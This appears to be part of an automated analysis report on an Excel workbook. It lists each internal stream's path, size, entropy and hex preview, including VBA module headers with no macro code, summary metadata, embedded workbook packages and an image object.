                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Attribute VB_Name = "Sheet1"
                                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                        Attribute VB_GlobalNameSpace = False
                                                                        Attribute VB_Creatable = False
                                                                        Attribute VB_PredeclaredId = True
                                                                        Attribute VB_Exposed = True
                                                                        Attribute VB_TemplateDerived = False
                                                                        Attribute VB_Customizable = True
                                                                        

                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                                                                        VBA File Name:Sheet2.cls
                                                                        Stream Size:977
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Attribute VB_Name = "Sheet2"
                                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                        Attribute VB_GlobalNameSpace = False
                                                                        Attribute VB_Creatable = False
                                                                        Attribute VB_PredeclaredId = True
                                                                        Attribute VB_Exposed = True
                                                                        Attribute VB_TemplateDerived = False
                                                                        Attribute VB_Customizable = True
                                                                        

                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                        VBA File Name:ThisWorkbook.cls
                                                                        Stream Size:985
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Attribute VB_Name = "ThisWorkbook"
                                                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                        Attribute VB_GlobalNameSpace = False
                                                                        Attribute VB_Creatable = False
                                                                        Attribute VB_PredeclaredId = True
                                                                        Attribute VB_Exposed = True
                                                                        Attribute VB_TemplateDerived = False
                                                                        Attribute VB_Customizable = True
                                                                        

                                                                        General
                                                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                        VBA File Name:Sheet1.cls
                                                                        Stream Size:977
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' u . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 18 27 75 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Attribute VB_Name = "Sheet1"
                                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                        Attribute VB_GlobalNameSpace = False
                                                                        Attribute VB_Creatable = False
                                                                        Attribute VB_PredeclaredId = True
                                                                        Attribute VB_Exposed = True
                                                                        Attribute VB_TemplateDerived = False
                                                                        Attribute VB_Customizable = True
                                                                        

                                                                        General
                                                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                        VBA File Name:Sheet2.cls
                                                                        Stream Size:977
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 18 c3 12 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Attribute VB_Name = "Sheet2"
                                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                        Attribute VB_GlobalNameSpace = False
                                                                        Attribute VB_Creatable = False
                                                                        Attribute VB_PredeclaredId = True
                                                                        Attribute VB_Exposed = True
                                                                        Attribute VB_TemplateDerived = False
                                                                        Attribute VB_Customizable = True
                                                                        

                                                                        General
                                                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                        VBA File Name:Sheet3.cls
                                                                        Stream Size:977
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 18 0e 67 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Attribute VB_Name = "Sheet3"
                                                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                        Attribute VB_GlobalNameSpace = False
                                                                        Attribute VB_Creatable = False
                                                                        Attribute VB_PredeclaredId = True
                                                                        Attribute VB_Exposed = True
                                                                        Attribute VB_TemplateDerived = False
                                                                        Attribute VB_Customizable = True
                                                                        

                                                                        General
                                                                        Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                        VBA File Name:ThisWorkbook.cls
                                                                        Stream Size:985
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 18 7e ac 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Attribute VB_Name = "ThisWorkbook"
                                                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                        Attribute VB_GlobalNameSpace = False
                                                                        Attribute VB_Creatable = False
                                                                        Attribute VB_PredeclaredId = True
                                                                        Attribute VB_Exposed = True
                                                                        Attribute VB_TemplateDerived = False
                                                                        Attribute VB_Customizable = True
                                                                        

                                                                        General
                                                                        Stream Path:\x1CompObj
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:114
                                                                        Entropy:4.25248375192737
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:244
                                                                        Entropy:2.889430592781307
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                        General
                                                                        Stream Path:\x5SummaryInformation
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:200
                                                                        Entropy:3.250350317504982
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . w f L . . . . . . . . .
                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F22/\x1CompObj
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:99
                                                                        Entropy:3.631242196770981
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F22/Package
                                                                        CLSID:
                                                                        File Type:Microsoft Excel 2007+
                                                                        Stream Size:12479
                                                                        Entropy:7.09513886571729
                                                                        Base64 Encoded:True
                                                                        Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/\x1CompObj
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:114
                                                                        Entropy:4.25248375192737
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/\x5DocumentSummaryInformation
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:244
                                                                        Entropy:2.701136490257069
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/\x5SummaryInformation
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:220
                                                                        Entropy:3.372234242231489
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD0018D4CE/\x1Ole
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:20
                                                                        Entropy:0.5689955935892812
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD0018D4CE/\x3ObjInfo
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:4
                                                                        Entropy:0.8112781244591328
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . .
                                                                        Data Raw:00 00 03 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD0018D4CE/Contents
                                                                        CLSID:
                                                                        File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                        Stream Size:197671
                                                                        Entropy:6.989042939766534
                                                                        Base64 Encoded:True
                                                                        Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                        Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD0068D442/\x1CompObj
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:114
                                                                        Entropy:4.219515110876372
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD0068D442/Package
                                                                        CLSID:
                                                                        File Type:Microsoft Excel 2007+
                                                                        Stream Size:26243
                                                                        Entropy:7.635433729726103
                                                                        Base64 Encoded:True
                                                                        Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/\x1CompObj
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:114
                                                                        Entropy:4.25248375192737
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/\x5DocumentSummaryInformation
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:248
                                                                        Entropy:3.0523231150355867
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/\x5SummaryInformation
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:256
                                                                        Entropy:4.086306928392587
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/Workbook
                                                                        CLSID:
                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                        Stream Size:134792
                                                                        Entropy:7.974168320310173
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                                                                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                                                                        CLSID:
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Stream Size:468
                                                                        Entropy:5.269289820125323
                                                                        Base64 Encoded:True
